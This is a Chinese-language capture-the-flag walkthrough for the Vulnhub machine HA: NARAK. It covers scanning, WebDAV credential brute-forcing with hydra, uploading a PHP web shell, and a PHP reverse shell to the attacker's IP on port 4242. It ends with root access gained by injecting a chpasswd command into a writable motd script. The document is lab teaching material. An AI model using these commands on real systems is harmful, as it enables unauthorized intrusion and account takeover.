Vulnhub HA: NARAK 靶机渗透
字数 1014 2025-08-15 21:33:52

HA: NARAK 靶机渗透教学文档

靶机基础信息

  • 下载链接: https://www.vulnhub.com/entry/ha-narak,569/
  • 发布日期: 2020年9月23日
  • 难度等级: 容易/中等
  • 目标: 获取两个flag文件(user.txt和root.txt)
  • 运行环境: VMware Workstation Pro (桥接模式)

渗透测试流程

一、信息收集阶段

  1. 发现靶机IP

    nmap 192.168.1.0/24
    
    • 发现靶机IP为192.168.1.104
  2. 端口扫描与服务识别

    nmap -sV -p- -O -A 192.168.1.104
    
    • 开放端口:
      • 22/tcp: OpenSSH 7.6p1 (Ubuntu)
      • 80/tcp: Apache httpd 2.4.29 (Ubuntu)
  3. 网站信息收集

    • 访问http://192.168.1.104/
    • 检查网页源码未发现可利用信息

二、漏洞探测

  1. 目录扫描

    • 发现/webdav目录: http://192.168.1.104/webdav
  2. WebDAV认证爆破

    • 使用cewl生成字典:
      cewl 192.168.1.104 -w pass.txt
      
    • 使用hydra爆破:
      hydra -L pass.txt -P pass.txt 192.168.1.104 http-get /webdav
      
    • 获取凭证:
      • 用户名: yamdoot
      • 密码: Swarg

三、漏洞利用

  1. WebDAV文件上传

    • 使用cadaver工具上传PHP木马:
      cadaver http://192.168.1.104/webdav/
      put 1.php
      
    • 木马内容(1.php):
      <?php system($_GET['cmd']); ?>
      
  2. 反弹Shell

    • 通过木马执行命令:
      php -r '$sock=fsockopen("192.168.1.107",4242);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'
      
    • 升级交互式shell:
      python3 -c "import pty;pty.spawn('/bin/bash')"
      
  3. 获取user.txt

    • 路径: /home/inferno/user.txt
  4. 密码破解

    • 在/mnt目录发现hell.sh
    • 包含Brainfuck加密字符串
    • 使用在线工具解密: https://www.splitbrain.org/services/ook
    • 获取明文密码: chitragupt
    • 尝试SSH登录:
      • 成功登录inferno用户(用户名:inferno, 密码:chitragupt)

四、权限提升

  1. 信息收集

    • 下载并运行linpeas.sh:
      git clone https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite.git
      python3 -m http.server 8001
      chmod 777 linpeas.sh
      ./linpeas.sh
      
  2. 发现可写文件

    • 发现/etc/update-motd.d/00-header可写
    • 该文件是SSH登录时的欢迎界面脚本
  3. 修改root密码

    echo "echo 'root:admin' | sudo chpasswd" >> 00-header
    
    • 重新登录SSH后执行命令修改root密码
  4. 获取root.txt

    • 路径: /root/root.txt

总结

该靶机渗透过程涉及以下关键技能:

  1. WebDAV服务识别与利用
  2. 密码爆破与字典生成
  3. 文件上传漏洞利用
  4. Brainfuck加密破解
  5. 通过可写文件进行权限提升

适合初学者练习基础渗透测试技能,特别是Web应用漏洞利用和Linux权限提升技术。

HA: NARAK 靶机渗透教学文档 靶机基础信息 下载链接: https://www.vulnhub.com/entry/ha-narak,569/ 发布日期: 2020年9月23日 难度等级: 容易/中等 目标: 获取两个flag文件(user.txt和root.txt) 运行环境: VMware Workstation Pro (桥接模式) 渗透测试流程 一、信息收集阶段 发现靶机IP 发现靶机IP为192.168.1.104 端口扫描与服务识别 开放端口: 22/tcp: OpenSSH 7.6p1 (Ubuntu) 80/tcp: Apache httpd 2.4.29 (Ubuntu) 网站信息收集 访问http://192.168.1.104/ 检查网页源码未发现可利用信息 二、漏洞探测 目录扫描 发现/webdav目录: http://192.168.1.104/webdav WebDAV认证爆破 使用cewl生成字典: 使用hydra爆破: 获取凭证: 用户名: yamdoot 密码: Swarg 三、漏洞利用 WebDAV文件上传 使用cadaver工具上传PHP木马: 木马内容(1.php): 反弹Shell 通过木马执行命令: 升级交互式shell: 获取user.txt 路径: /home/inferno/user.txt 密码破解 在/mnt目录发现hell.sh 包含Brainfuck加密字符串 使用在线工具解密: https://www.splitbrain.org/services/ook 获取明文密码: chitragupt 尝试SSH登录: 成功登录inferno用户(用户名:inferno, 密码:chitragupt) 四、权限提升 信息收集 下载并运行linpeas.sh: 发现可写文件 发现/etc/update-motd.d/00-header可写 该文件是SSH登录时的欢迎界面脚本 修改root密码 重新登录SSH后执行命令修改root密码 获取root.txt 路径: /root/root.txt 总结 该靶机渗透过程涉及以下关键技能: WebDAV服务识别与利用 密码爆破与字典生成 文件上传漏洞利用 Brainfuck加密破解 通过可写文件进行权限提升 适合初学者练习基础渗透测试技能,特别是Web应用漏洞利用和Linux权限提升技术。